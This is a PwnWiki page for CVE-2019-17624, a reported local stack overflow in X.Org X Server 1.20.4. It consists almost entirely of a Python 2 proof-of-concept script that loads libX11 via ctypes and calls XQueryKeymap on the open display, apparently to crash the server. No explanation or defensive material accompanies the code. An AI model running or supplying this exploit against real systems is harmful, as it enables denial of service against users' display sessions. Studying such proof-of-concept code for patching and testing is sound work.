CVE-2019-17624 X Server 本地棧溢出漏洞

From PwnWiki
Revision as of 13:47, 15 April 2021 by Pwnwiki (talk | contribs) (Created page with "==POC== <pre> #!/usr/bin/python #coding: utf-8 # ************************************************************************ # * Author: Marcelo Vázquez (aka s4v...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

POC

#!/usr/bin/python
#coding: utf-8

# ************************************************************************
# *                Author: Marcelo Vázquez (aka s4vitar)                 *
# *      X.Org X Server 1.20.4 / X Protocol Version 11 (Stack Overflow)  *
# ************************************************************************

import sys, time
import ctypes as ct

from ctypes import cast
from ctypes.util import find_library

def access_violation(x11, current_display):
  keyboard = (ct.c_char * 1000)()
  x11.XQueryKeymap(current_display, keyboard)

if __name__ == '__main__':

  print "\n[*] Loading x11...\n"
  time.sleep(2)

  x11 = ct.cdll.LoadLibrary(find_library("X11"))
  current_display = x11.XOpenDisplay(None)

  print "[*] Exploiting...\n"
  time.sleep(1)

  try:
    access_violation(x11, current_display)

  except:
    print "\nError...\n"
    sys.exit(1)
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2019-17624_X_Server_本地棧溢出漏洞&oldid=1678"